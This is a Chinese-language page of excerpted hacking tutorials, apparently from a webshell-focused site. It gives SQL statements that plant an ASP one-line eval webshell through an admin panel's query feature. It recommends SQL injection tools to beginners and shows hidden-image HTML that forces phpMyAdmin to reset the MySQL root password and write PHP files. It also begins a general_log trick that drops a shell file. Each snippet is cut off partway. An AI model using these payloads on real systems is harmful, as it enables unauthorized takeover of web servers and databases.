今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了 以下拿webshell步骤 第一句代码 create table cmd (a varchar(50)) 第二句代码 insert into cmd (a) values (‘<%evalrequest(“qing520”)%>’) 第三句代码 select * into [a] in ‘d:wwwrootwjqcadadmin163Databackupx.asp;x.xls’ ‘excel 4.0;’ ...
SQL Injection: 啊D 算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手 明小子 比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的 NBSI 这个软件对于SQL server的注入有极高的准确率 Pangolin 俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后Pangolin就死了,但是对于小菜来说这个工具还是不错的;针对多种平台,多...
修改root密码: 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" /> 密码为:www.webshell.cc 写文件 首先你要知道路径 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select%20'<?php%20phpinfo();?>'%20into%20outfile%20'/var/www/html/test.php...
三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 ——————————————————— set global general_log=’on’; ——————————————————— SET global general_log_file=’D:/webshell/www/cmd.php’; ————————...